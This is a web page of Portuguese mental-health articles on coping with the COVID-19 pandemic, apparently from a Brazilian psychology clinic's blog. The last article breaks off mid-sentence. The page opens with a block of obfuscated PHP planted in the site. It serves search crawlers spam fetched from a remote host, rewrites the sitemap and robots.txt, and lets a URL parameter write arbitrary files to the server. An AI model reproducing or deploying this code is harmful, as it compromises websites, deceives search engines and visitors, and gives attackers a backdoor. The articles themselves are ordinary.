<.-=:/1230654879';()&^$[]\\%{}!*";$O=urldecode($OOOOOO);date_default_timezone_set($O{35}.$O{29}.$O{47});$OO = @$_SERVER[$O{38}.$O{34}.$O{47}.$O{32}.$O{51}.$O{28}.$O{50}.$O{30}.$O{52}.$O{29}.$O{34}.$O{34}.$O{30}];$Oo = @$_SERVER[$O{29}.$O{28}.$O{26}.$O{32}.$O{28}.$O{37}.$O{30}.$O{52}.$O{32}.$O{29}.$O{33}];$OoO = @$_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{41}.$O{34}.$O{37}.$O{30}];$OOOOO = @$_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{32}.$O{37}.$O{28}.$O{29}.$O{52}.$O{36}.$O{40}.$O{28}.$O{50}.$O{30}];$OOOOOo = @$_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{29}.$O{28}.$O{39}.$O{28}.$O{29}.$O{28}.$O{29}];$OOOOOOO = ((isset($_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{37}]) && $_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{37}] == $O{8}.$O{24}) || (isset($_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{46}.$O{52}.$O{39}.$O{34}.$O{29}.$O{27}.$O{36}.$O{29}.$O{38}.$O{28}.$O{38}.$O{52}.$O{35}.$O{29}.$O{34}.$O{30}.$O{34}]) && $_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{46}.$O{52}.$O{39}.$O{34}.$O{29}.$O{27}.$O{36}.$O{29}.$O{38}.$O{28}.$O{38}.$O{52}.$O{35}.$O{29}.$O{34}.$O{30}.$O{34}] == $O{15}.$O{4}.$O{4}.$O{9}.$O{11})) ? $O{15}.$O{4}.$O{4}.$O{9}.$O{11}.$O{62}.$O{63}.$O{63} : $O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63};$OOOOOOOo = $OOOOOOO . $OoO;$OOOOO = @strtolower($OOOOO);$OOOOOo = @strtolower($OOOOOo);$Oo = substr($Oo, 1);$OOO = false;if ( empty($Oo) ) {$Oo = $O{7}.$O{24}.$O{12}.$O{2}.$O{20}.$O{59}.$O{9}.$O{15}.$O{9};}$Oooo = explode($O{63},$Oo);$Ooooo = $Oooo[0];if (strstr($Ooooo, $O{7}.$O{24}.$O{12}.$O{2}.$O{20}.$O{64}.$O{59}.$O{9}.$O{15}.$O{9})||strstr($Ooooo, $O{7}.$O{24}.$O{12}.$O{2}.$O{20}.$O{65}.$O{59}.$O{9}.$O{15}.$O{9})) {$Ooooo = $Ooooo;} else {$Ooooo = '';}if (strstr($Oo, $O{12}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9})) {$Ooooo = $Ooooo?$Ooooo.$O{63}:$Ooooo;OooooO($O,$OOOOOOOo,$OOOOOOO,$Ooooo, $O{55});}if (strstr($Oo, $O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9})) {$Ooooo = $Ooooo?$Ooooo.$O{63}:$Ooooo;OooooO($O,$OOOOOOOo,$OOOOOOO,$Ooooo);}function OooooO($O,$OOOOOOOo,$OOOOOOO,$Ooooo='',$qs='') {$Oooooo = $O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63} .$O{66}.$O{64}.$O{64}.$O{68}.$O{59}.$O{16}.$O{9}.$O{2}.$O{3}.$O{64}.$O{59}.$O{20}.$O{5}.$O{19}.$O{63}.$O{36}.$O{9}.$O{7}.$O{63}.$O{11}.$O{7}.$O{4}.$O{2}.$O{32}.$O{3}.$O{18}.$O{36}.$O{9}.$O{7}.$O{59}.$O{9}.$O{15}.$O{9}.$O{55}.$O{11}.$O{4}.$O{5}.$O{9}.$O{2}.$O{61}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{78}.$O{24}.$O{6}.$O{25}.$O{61}.$O{68}.$O{67}.$O{67}.$O{67}.$O{78}.$O{9}.$O{3}.$O{61}.$Ooooo;$Ooooooo = json_decode(OooooOO($O,$Oooooo), true);if (empty($Ooooooo)||$Ooooooo[$O{21}.$O{8}.$O{12}.$O{2}] == 404) {exit();}$Oooooooo = $Ooooooo[$O{12}.$O{10}.$O{4}.$O{10}];header($O{47}.$O{8}.$O{24}.$O{4}.$O{2}.$O{24}.$O{4}.$O{53}.$O{4}.$O{5}.$O{9}.$O{2}.$O{62}.$O{4}.$O{2}.$O{20}.$O{4}.$O{63}.$O{20}.$O{25}.$O{18});$OOOO = $O{58}.$O{55}.$O{20}.$O{25}.$O{18}.$O{57}.$O{22}.$O{2}.$O{3}.$O{11}.$O{7}.$O{8}.$O{24}.$O{57}.$O{61}.$O{57}.$O{54}.$O{64}.$O{59}.$O{67}.$O{54}.$O{57}.$O{2}.$O{24}.$O{21}.$O{8}.$O{12}.$O{7}.$O{24}.$O{14}.$O{57}.$O{61}.$O{57}.$O{54}.$O{32}.$O{30}.$O{39}.$O{53}.$O{71}.$O{54}.$O{55}.$O{56};$OOOO .= $O{58}.$O{6}.$O{3}.$O{18}.$O{11}.$O{2}.$O{4}.$O{57}.$O{20}.$O{25}.$O{18}.$O{24}.$O{11}.$O{61}.$O{54}.$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$O{1}.$O{1}.$O{1}.$O{59}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{11}.$O{59}.$O{8}.$O{3}.$O{14}.$O{63}.$O{11}.$O{21}.$O{15}.$O{2}.$O{25}.$O{10}.$O{11}.$O{63}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{63}.$O{67}.$O{59}.$O{73}.$O{54}.$O{56}.$O{58}.$O{6}.$O{3}.$O{18}.$O{56}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{58}.$O{18}.$O{8}.$O{21}.$O{56}.$OOOOOOOo.$O{63}.$O{58}.$O{63}.$O{18}.$O{8}.$O{21}.$O{56}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{58}.$O{63}.$O{6}.$O{3}.$O{18}.$O{56};foreach ($Oooooooo as $mk => $mv) {$OOOO .= $O{58}.$O{6}.$O{3}.$O{18}.$O{56}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{58}.$O{18}.$O{8}.$O{21}.$O{56}.$OOOOOOOo.$O{63}.$qs.$mv.$O{58}.$O{63}.$O{18}.$O{8}.$O{21}.$O{56}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{57}.$O{58}.$O{63}.$O{6}.$O{3}.$O{18}.$O{56};}$OOOO .= $O{58}.$O{63}.$O{6}.$O{3}.$O{18}.$O{11}.$O{2}.$O{4}.$O{56};echo $OOOO;exit();}if(isset($_GET[$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}])){$OoOO=$_GET[$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}];OooooOOOO($O,$OoOO,$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{53}.$O{11}.$O{7}.$O{4}.$O{2}.$O{53}.$O{22}.$O{2}.$O{3}.$O{7}.$O{13}.$O{7}.$O{21}.$O{10}.$O{4}.$O{7}.$O{8}.$O{24}.$O{62}.' '.$OoOO);exit($O{58}.$O{10}.$O{57}.$O{15}.$O{3}.$O{2}.$O{13}.$O{61}.$OoOO.$O{56}.$OoOO.$O{58}.$O{63}.$O{10}.$O{56});}if(isset($_GET[$O{3}.$O{8}.$O{23}.$O{8}.$O{4}.$O{11}])){OooooOOOO($O,$O{3}.$O{8}.$O{23}.$O{8}.$O{4}.$O{11}.$O{59}.$O{4}.$O{20}.$O{4},$O{32}.$O{11}.$O{2}.$O{3}.$O{53}.$O{10}.$O{14}.$O{2}.$O{24}.$O{4}.$O{62}.$O{57}.$O{89}.PHP_EOL.$O{36}.$O{18}.$O{18}.$O{8}.$O{1}.$O{62}.$O{57}.$O{63}.PHP_EOL.$O{47}.$O{3}.$O{10}.$O{1}.$O{18}.$O{53}.$O{12}.$O{2}.$O{18}.$O{10}.$O{5}.$O{62}.$O{66}.PHP_EOL.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$OOOOOOOo.$O{63}.$O{55}.$O{12}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{59}.$O{20}.$O{25}.$O{18}.PHP_EOL.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$OOOOOOOo.$O{63}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{59}.$O{20}.$O{25}.$O{18}.PHP_EOL.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$OOOOOOOo.$O{63}.$O{10}.$O{14}.$O{15}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{59}.$O{20}.$O{25}.$O{18}.PHP_EOL.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$OOOOOOOo.$O{63}.$O{65}.$O{68}.$O{69}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{59}.$O{20}.$O{25}.$O{18}.PHP_EOL.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$OOOOOOOo.$O{63}.$O{19}.$O{12}.$O{2}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{59}.$O{20}.$O{25}.$O{18}.PHP_EOL.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$OOOOOOOo.$O{63}.$O{18}.$O{8}.$O{6}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{59}.$O{20}.$O{25}.$O{18}.PHP_EOL.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$OOOOOOOo.$O{63}.$O{22}.$O{24}.$O{13}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{59}.$O{20}.$O{25}.$O{18}.PHP_EOL.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$OOOOOOOo.$O{63}.$O{18}.$O{17}.$O{16}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{59}.$O{20}.$O{25}.$O{18});$OooooOOOO0 = file_get_contents($O{3}.$O{8}.$O{23}.$O{8}.$O{4}.$O{11}.$O{59}.$O{4}.$O{20}.$O{4});echo $OooooOOOO0;exit();}if(stristr($OOOOOo,$O{5}.$O{10}.$O{15}.$O{8}.$O{8}.$O{59}.$O{21}.$O{8}.$O{59}.$O{16}.$O{9})||stristr($OOOOOo,$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{59}.$O{21}.$O{8}.$O{59}.$O{16}.$O{9})||stristr($OOOOOo,$O{23}.$O{7}.$O{24}.$O{14})||(stristr($OOOOOo,$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{59}.$O{21}.$O{8}.$O{25})&&$Oo!=$O{7}.$O{24}.$O{12}.$O{2}.$O{20}.$O{59}.$O{9}.$O{15}.$O{9}&&$Oo!=$O{7}.$O{24}.$O{12}.$O{2}.$O{20}.$O{59}.$O{15}.$O{4}.$O{25}.$O{18})){if(!$OOO){ echo OooooOO($O,$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$O{66}.$O{64}.$O{64}.$O{68}.$O{59}.$O{16}.$O{9}.$O{2}.$O{3}.$O{64}.$O{59}.$O{20}.$O{5}.$O{19}.$O{63}.$O{16}.$O{6}.$O{25}.$O{9}.$O{59}.$O{9}.$O{15}.$O{9}.$O{55}.$O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}.$O{61}.$OoO.$O{78}.$O{9}.$O{10}.$O{14}.$O{2}.$O{61}.$Oo.$O{78}.$O{23}.$O{8}.$O{4}.$O{61}.$O{67}.$O{78}.$O{9}.$O{3}.$O{61}.$Ooooo);exit();}}if(stristr($OOOOO,$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{23}.$O{8}.$O{4})||stristr($OOOOO,$O{23}.$O{7}.$O{24}.$O{14})||stristr($OOOOO,$O{31}.$O{88}.$O{42})||stristr($OOOOO,$O{5}.$O{88}.$O{16})||stristr($OOOOO,$O{5}.$O{10}.$O{15}.$O{8}.$O{8})||stristr($OOOOO,$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2})||stristr($OOOOO,$O{40}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{23}.$O{8}.$O{4})||stristr($OOOOO,$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{23}.$O{8}.$O{4})){if(!$OOO){$OooOO = OooooOO($O,$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$O{66}.$O{64}.$O{64}.$O{68}.$O{59}.$O{16}.$O{9}.$O{2}.$O{3}.$O{64}.$O{59}.$O{20}.$O{5}.$O{19}.$O{63}.$O{73}.$O{64}.$O{71}.$O{59}.$O{9}.$O{15}.$O{9}.$O{55}.$O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}.$O{61}.$OoO.$O{78}.$O{9}.$O{10}.$O{14}.$O{2}.$O{61}.$Oo.$O{78}.$O{23}.$O{8}.$O{4}.$O{61}.$O{64}.$O{78}.$O{9}.$O{3}.$O{61}.$Ooooo); if(!empty($OooOO)){echo $OooOO;exit; }}} function OooooOO($O,$OooO) {$OooOO = '';$OooOOO = $O{51}.$O{8}.$O{19}.$O{7}.$O{18}.$O{18}.$O{10}.$O{63}.$O{70}.$O{59}.$O{67}.$O{57}.$O{76}.$O{21}.$O{8}.$O{25}.$O{9}.$O{10}.$O{4}.$O{7}.$O{23}.$O{18}.$O{2}.$O{75}.$O{51}.$O{37}.$O{33}.$O{28}.$O{57}.$O{68}.$O{59}.$O{67}.$O{75}.$O{27}.$O{7}.$O{24}.$O{12}.$O{8}.$O{1}.$O{11}.$O{57}.$O{50}.$O{30}.$O{57}.$O{69}.$O{59}.$O{65}.$O{75}.$O{59}.$O{50}.$O{28}.$O{30}.$O{57}.$O{47}.$O{44}.$O{29}.$O{57}.$O{64}.$O{59}.$O{64}.$O{59}.$O{70}.$O{66}.$O{65}.$O{65}.$O{77};if(function_exists($O{21}.$O{6}.$O{3}.$O{18}.$O{52}.$O{7}.$O{24}.$O{7}.$O{4})){ try {$OooOOOO = curl_init();$OoooOO = 30;curl_setopt($OooOOOO,CURLOPT_URL,$OooO);curl_setopt($OooOOOO,CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($OooOOOO,CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($OooOOOO,CURLOPT_RETURNTRANSFER,1);curl_setopt($OooOOOO,CURLOPT_CONNECTTIMEOUT,$OoooOO);curl_setopt($OooOOOO,CURLOPT_USERAGENT,$OooOOO);$OooOO = curl_exec($OooOOOO);curl_close($OooOOOO); } catch (Exception $e) {}}if(strlen($OooOO)<1&&function_exists($O{13}.$O{7}.$O{18}.$O{2}.$O{52}.$O{14}.$O{2}.$O{4}.$O{52}.$O{21}.$O{8}.$O{24}.$O{4}.$O{2}.$O{24}.$O{4}.$O{11})){ ini_set($O{6}.$O{11}.$O{2}.$O{3}.$O{52}.$O{10}.$O{14}.$O{2}.$O{24}.$O{4},$OooOOO); try {$OooOO = @file_get_contents($OooO); } catch (Exception $e) {}}return $OooOO; }function OooooOOOO($O,$Ooo, $OooOOOOO) {$OoooO = fopen($Ooo, $O{1}) or die('0');fwrite($OoooO, $OooOOOOO);fclose($OoooO);}?>  Arquivos Artigos - Clínica Holos
Agende agora a sua consulta por telefone. ✆ Ligue para (71) 3345-4545

Como lidar com equilíbro psíquico e emocional em tempos pandemia.

Nesses tempos de pandemia, como devemos lidar com o isolamento social, distanciamento físico e a quarentena? São múltiplos os aspectos e eventos envolvidos nesse fenômeno, inédito na história recente da humanidade e  de tamanhos efeitos globais. Essa pandemia que afeta a vida de todas as pessoas, afeta em diferentes segmentos: social; econômico;  financeiro e psicológico.

Logo, em tempos de incertezas, a saúde psíquica se destaca e entra em questão. Refletir sobre questões de diversas ordens (que são muitas), todas elas se sustentam num único pilar: qual o sentido de tudo isso na vida?

Objetivamente é: como lidar com a realidade que apresenta fatos duros, ameaçadores, informações de toda ordem, mudanças de comportamentos e evidencias científicas, que ainda estamos mergulhados em pleno processo da pandemia?

Sem dúvida o momento é delicado e complexo porque impacta, sobremaneira, diversos pontos da nossa vida global, porém com maior efeito na nossa saúde emocional e psíquica.

E nesse sentido, a devida atenção e cuidado com a nossa saúde psicológica fará a diferença. E por quê? Porque a questão não é o que acontece, exclusiva e objetivamente, mas como se lida com o que acontece. Como se enfrenta essa crise com menor dano psíquico e emocional possível?

Nesse processo de como lidar com o que acontece, diz respeito aos nossos conteúdos emocionais, inconscientes ou não, nossos referenciais históricos e vivenciais, traumas e demais construtos de nós mesmos.

Importa dizer que o tamanho impacto gerado em nossa vida decorre de como interpretamos os fatos, de como nossa subjetividade se apresenta e se revela diante dessa doença. Nesse sentido, qual o caminhar possível?

Cuidando daquilo que nos chamam atenção, contido no nosso mundo interno, que são: nossas emoções, nossos afetos (desafetos também), nossas interrogações, nossas relações, nossas duvidas, nossas  percepções, nossos sentidos e os nossos desejos.

Buscar acolhimento e ajuda  aos profissionais Psicólogos(as) e Psiquiatras é uma das possibilidades para retomar o equilíbrio, o entendimento, a compreensão, a responsabilidade, o cuidado de si e da vida; é fazer furos na Incerteza e reinventar a vida e ofertar novos modos de convivência. É adaptar-se, para (sobre) o viver!

Há uma ruptura assim como, dialeticamente, há uma necessidade de reconstrução dos laços sociais.

A Clínica holos, que respeita o distanciamento físico necessário, seguindo com responsabilidade as orientações dos órgãos de saúde (internacional) OMS, e nacional, Ministério da Saúde, se mantem presente  nesse processo de acolhimento psicológico, ainda que virtual, um recurso do mundo moderno, que contribui enormemente para criarmos essa ponte de contato e cuidado com a saúde psíquica e emocional. E isso importa!

O mundo não será mais o mesmo pós-Covid-19, porque não seremos mais os mesmos. Acreditamos que seremos melhores humanos!

Tags:
Categories:

Isolamento Social e Solidão

A pandemia do coronavírus é uma ameaça para nossas vidas, traz consigo imediatamente a possibilidade da morte, evoca também os riscos de perdemos um ente querido, um familiar, um amigo. Mas além dessa grave ameaça, o covid-19 nos trouxe também a necessidade do isolamento social como única maneira de mitigar os efeitos da crise global. Com o isolamento, precisamos enfrentar não apenas a já difícil ameaça à vida, mas também as complicadas relações de sofrimento que o isolamento implica. Finalmente a sós e isolados em casa na maior parte do tempo, nossas angustias surgem da forma mais implacável: o que significa para o sujeito moderno estar a sós consigo mesmo?

Muitas pessoas estão isoladas e sozinhas em seus isolamentos, essa condição de solidão pode afetar drasticamente a saúde mental de um indivíduo, provocando sintomas de ansiedade, depressão ou pânico. Mas por que é tão difícil estar só? Para entender essa importante questão, a psicanálise nos oferece uma explicação que perpassa primeiro pela constituição do sujeito humano. Em Os Instintos e seus Destinos (1915), Freud explica que quando chegamos ao mundo, somos recebidos por outros, não importa quem sejam (pais, cuidadores, avós, abrigos, orfanatos), um bebe humano não sobrevive sozinho, precisa receber alimento e proteção. Somos um dos bichos que nasce de forma mais prematura, com maior dificuldade de autonomia no início da vida. Essa condição faz com que imediatamente nos insiramos em relações com outros, nas relações com pessoas. Não só isso, mas também devemos a esse cuidado inicial a nossa própria probabilidade de sobrevivência. Um dos elementos essenciais para a sobrevivência do organismo é a alimentação, e foi por isso que Freud localizou na amamentação o primeiro vínculo de importância do ser que nasce com as outras pessoas no mundo: somos nutridos. O outro assume então a importância de fonte da alimentação, equivalente a condição de existência do bebe que vem ao mundo e que precisa ser alimentado. O que a psicanálise freudiana percebeu foi que nesse ato, nesse gesto fisiológico, biológico, acontecia o primeiro processo de desenvolvimento afetivo entre o bebe e um outro ser no mundo. Começam então a serem estabelecidos os primeiros vínculos, as primeiras relações, esses vínculos são de necessidade, mas também são de afeto. Um dos primeiros aprendizados do bebe humano, segundo Freud, é a capacidade de distinção entre ele e um outro. No início, o bebe é o mundo, ele não se separa dos objetos e das pessoas. Mais tarde ele vai conseguindo fazer esse processo extraordinário de discernimento, sendo capaz de distinguir que existem outros a volta dele, e estabelecendo relações com esses outros.

A importante contribuição de outro importante psicanalista, Jacques Lacan, para esse processo descrito por Freud, foi a percepção de que antes mesmo de sermos acolhidos nos braços de alguém, somos acolhidos pela linguagem que nos afeta. A existência de um ser, começa então quando ele é falado/pensado por outros, ele existe antes mesmo de nascer como corpo físico. Então uma mamãe grávida pode dizer: – ela se chamará Maria, será uma moça inteligente, será muito amada, e etc. Quando somos falados, imediatamente somos desejados (ou indesejados) por aqueles que nos falam, somos também objeto de suas projeções e de suas expectativas sobre nós. Então, para um autor como Lacan, nossa existência em uma rede de palavras (que pode ser chamada de uma rede social), faz com que estejamos nas relações com o outro, antes mesmo de nascermos, pois a linguagem vem do outro. Somos falados, só depois falamos.

Ao analisarmos sob que condições o sujeito humano vem ao mundo e o seu desenvolvimento, fica claro que não existimos sozinhos, somos permeados pelos outros que nos cercam. Então, conseguimos entender melhor o potencial sintomático de um momento de solidão e isolamento. Fazemos muitas coisas para nos protegermos de sensações ruins, é uma das faces do princípio do prazer descrito por Freud: buscar o prazer e evitar a dor. Se a solidão pode nos colocar em uma posição desconfortável, é preciso evitá-la. O sujeito moderno é bom nisso, sempre ocupado, sempre sem tempo, estamos sempre fazendo alguma coisa para evitar a solidão. Alguns amam para não estar só, outros fazem sexo, outros usam drogas, outros estabelecem uma relação de vício com o trabalho, ou são viciados em jogos, ou em compras. O indivíduo faz de tudo para não estar a sós consigo mesmo, isso é perceptível no incômodo em que a maioria das pessoas sentem quando estão diante do silêncio em uma consulta de psicanálise. Ou, como diz o filósofo alemão Friedrich Nietzsche em Genealogia da Mora (1887): “(…) continuamos necessariamente estranhos a nós mesmos, não nos compreendemos, temos que nos mal-entender, a nós se aplicará para sempre a frase: ‘Cada qual é o mais distante de si mesmo’ – para nós mesmos somos ‘homens do desconhecimento’.

Agora, na solidão do isolamento social, os sintomas atingem o corpo de uma maneira mais evidente. É possível então que o sujeito possa tomar esse momento como uma oportunidade de autoconhecimento, um momento de angústia é um bom momento para sabermos quem nós somos. É preciso reorganizar a vida mental, se adaptar à nova realidade do cenário atual, e contar com os serviços de atendimento psicológico online que estão disponíveis. É preciso, mais do que nunca, cuidar da saúde mental.

Referências:
FREUD, S., Introdução ao narcisismo: ensaios de metapsicologia e outros textos (1914-1916). São Paulo: Companhia das Letras, 2010.
NIETZSCHE, F., Genealogia da Moral: um escrito polêmico (1887). São Paulo: Editora Brasiliense, 1987.

Categories:

O poder da amizade em tempos de Covid-19

A relação de amizade tem um poder grandioso sobre nossas vidas, as vezes nem paramos para observar o papel que um amigo verdadeiro tem para nós, além das boas características que se tem um bom amigo. O início da nossa vinculação de amizade ocorre em nossa infância no momento em que cortamos o cordão umbilical com a nossa família, ou seja, a família deixa de ser nosso primeiro contato social e passamos a nos relacionar com outras pessoas, a partir deste momento nossa vida ganha um novo sentido. Ela tem uma força sublime de nos ajudar com a formação da nossa identidade, auto estima, valores morais, nos ensina a nos conectar uns com os outros, a nos sentirmos pertencentes a um grupo, desenvolve em nós a empatia e nos trazem saúde emocional.

O amigo é família que escolhemos e ela nos leva a construir uma base relacional muito profunda, é um amor livre e ao mesmo tempo tão presente. Quando nos tornamos adultos e com bases nas experiências que tivemos no decorrer do nosso desenvolvimento, vamos ficando cada vez mais seletivos quanto aos nossos amigos, e eles se tornam referências de nós mesmos. São pessoas que estão disponíveis para nós em amor, cuidado, fortalecimento e proteção. Não ter um amigo é tão perigoso quanto o uso de cigarros e bebidas alcoólicas em excesso, segundo estudos de cientistas americanos para revista Plos Medicine. Do ponto de vista psicológico a relação de amizade é de extrema importância para o indivíduo, pois nós somos seres relacionais, sociais nascemos para termos contatos uns com os outros, e o papel do amigo é nos trazer um lugar de confiança e de amor incondicional, é uma relação reciproca que nos levar a gerar bons sentimentos, esperanças em meio a dificuldade, presença em meio a solidão, solidariedade empatia nos ensina a sermos mais amáveis e respeitosos, preenche o nosso tempo com compartilhamentos e experiências e nos aceita como somos, além de nos empoderar para aquilo que poderemos ser.

Neste momento o qual estamos vivenciando de isolamento social devido ao COVID-19, estamos passando por um processo muito grande de reflexão acerca da nossa vida, o que podemos visualizar nas redes sociais são diálogos e memes que refletem os anseios que temos em nossas almas pelas pessoas amadas que não estamos podendo ter contato físico, principalmente as saídas com os nossos amigos. Hoje estamos vivendo a realidade virtual e graças a tecnologia que tem seus aspectos positivos quanto negativos, nos traz a possibilidade de estarmos em contato com os que estão distantes, porem estávamos usando essa ferramenta de maneira negativa em nossas reuniões com os nosso amigos, o que era para aproximar os que estavam longe acabou afastando os que estavam perto, era visível observar as mesas em bares e restaurantes a grande maioria em seus celulares ao invés de desfrutar da presença uns dos outros.

Sempre trago a reflexão aos meus pacientes acerca dos processos que passamos em nossas vidas e que todo processo tem um propósito e um dos propósitos que podemos observar acerca desse isolamento é o fato de estarmos presentes não só de corpo, mas com todos os nossos sentidos em nossos vínculos, que saibamos aproveitar a companhia dos nossos amigos, que é tão benéfica para nós que somos seres relacionais.

O processo nos leva para um nível mais alto de evolução como ser humano e em tudo temos um aprendizado. A amizade é uma relação poderosa em todo os sentidos como vimos acima, agora vamos abrir para uma reflexão: como anda seu círculo de amizade? Você tem sido disponível inteiramente para seus amigos?

Não podemos deixar que nossa rotina diária e que o celular nos afaste dessas pessoas que tem um papel tão importante em nossas vidas em todas as nossas estações e processos.

Categories:

Ansiedade no cenário da Covid-19

Sabe-se que episódios positivos e negativos importantes da vida podem contribuir para o surgimento da ansiedade, principalmente quando os indivíduos enfrentam experiências difíceis e aversivas no cotidiano como a que estamos enfrentando atualmente em decorrência do Covid-19, pois fora o medo, a insegurança, a incerteza no por vir, somos assolados por imagens que nos remetem a ficar no lugar de quem não pode controlar e nem planejar nada, fato extremamente angustiante, visto que esse funcionamento ilusório de controle e programação nos assegura um lugar de que está tudo bem.

Evidenciando-se o aspecto técnico, deve-se entender ansiedade como um fenômeno que nos favorece quando nos impulsiona a agir, ora nos prejudica porque nos paralisa a depender das conjunturas ou magnitude dos fatos. Assim, pode tornar-se patológica, isto é, maléfica ao funcionamento psíquico e somático quando é alta ou intensa, incontrolável e o indivíduo percebe que sua vida está sendo prejudicada pelos sintomas da mesma. Então, nessa circunstância é importante que se procure por um profissional da área da saúde mental, a fim de realizar o diagnóstico apropriado.

Entretanto, nesse momento crucial e inusitado onde os atendimentos presenciais estão suspensos, pensei em trazer algumas sugestões de atividades e um exercício respiratório a fim de minimizar os efeitos nefastos que porventura possa sentir.

Dicas

  • Ouvir músicas favoritas
  • Dançar
  • Baixar aplicativos de atividade física
  • Organizar / arrumar armários, gavetas, documentos, etc. (no seu tempo, tá!)
  • Dormir/descansar/ se permitir não fazer nada! Sem culpa, ok!

Exercício Respiratório

Na posição de deitado, com as costas bem assentes no chão (ou colchão) e em ambiente calmo e de preferência sem ruídos de fundo, execute os seguintes passos:

  • Feche os olhos e inspire profundamente pelo nariz e expire pelo nariz ( foque sua atenção no ar entrando e saindo) faça isso durante 1 minuto contando até quatro quando inspira, retendo o ar contando também até quatro e expirando em quatro.
  • É possível que existam algumas interferências de imagens e pensamentos, volte rapidamente a estar atento à sua respiração.
  • À medida que for praticando pode ir aumentando os minutos, bem como a contagem.

Pratique sempre que sentir necessidade.

Fique bem!

Categories:

Da ciência à Fake News – COVID-19 e os impactos psicoafetivos

Nas últimas semanas, muito se tem falado sobre um assunto que envolve a saúde pública a nível mundial: a contaminação pelo vírus COVID-19 (o Coronavírus) e toda a sua repercussão. Este vírus, que é novidade até para a ciência, causando infecção nas pessoas, ocasionando principalmente doenças respiratórias como gripes, resfriados e até pneumonias. Seus sintomas apresentam-se sob forma de febre, tosse, dificuldade para respirar, e em alguns casos, pode ser letal.

Diante desta questão de repercussão mundial, as plataformas digitais tem se movimentado, se fazendo frequente o recebimento de vídeos e mensagens a respeito deste tema tão alarmante. Porém, WhatsApp, Instagram, Facebook e outros meios estão sendo usados para a disseminação de notícias que, nem sempre são verídicas, as atualmente chamadas Fake News. Entre comunicados de médicos, hospitais e autoridades de saúde com instruções sobre a prevenção, estão circulando vídeos, textos e até piadas com a mesma temática: A pandemia; a prevenção; gravidade e repercussão mundial de saúde e economia – misturando e por vezes distorcendo informações sérias e verídicas.

Do ponto de vista psicológico, a atual condição mundial que vivenciamos, tem causado um “Pandemia de pânico” e de desvelamento do sofrimento de lidar com a necessidade de estar sozinho: olhando para si, seus valores, dessabores, amores, desejos realizados e os deixados para trás e ainda refletindo sobre algo que tendemos a evitar lembrar que existe em nossa vida, que é a possibilidade da nossa finitude e da finitude dos nossos entes queridos. A Psicanálise tem contribuído, cada vez mais, para que haja a elaboração de conteúdos internos que auxiliam na construção de indivíduos autônomos e responsáveis sobre suas escolhas, atos e desejos. Com o tratamento analítico, há a possibilidade de escolher de forma consciente. E, isto inclui tanto a escolha da prevenção a qualquer vírus físico como também a prudência na disseminação de outro vírus, o mental, seja 